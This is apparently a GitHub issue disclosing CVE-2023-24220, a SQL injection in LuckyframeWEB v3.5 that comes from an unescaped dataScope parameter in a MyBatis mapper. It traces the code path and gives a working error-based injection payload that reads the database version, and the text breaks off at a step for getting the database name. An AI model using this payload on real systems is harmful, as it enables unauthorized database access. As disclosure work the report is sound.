Headline
CVE-2023-24220: sql inject 1 · Issue #22 · seagull1985/LuckyFrameWeb
LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/RoleMapper.xml.
src/main/resources/mybatis/system/RoleMapper.xml
There is a ${} in this mapper
<if test="deptId != null and deptId != 0"> AND (u.dept_id = #{deptId} OR u.dept_id IN ( SELECT t.dept_id FROM sys_dept t WHERE FIND_IN_SET (#{deptId},ancestors) )) </if> <!-- 数据范围过滤 --> ${params.dataScope} </select>
Search selectUserList to see where the this select id is used:
Query user information:
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java
Follow up the selectUserList method to see the specific implementation:
src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated
Verification:
Splice URL and parameters according to code:
Use error injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
Select database name: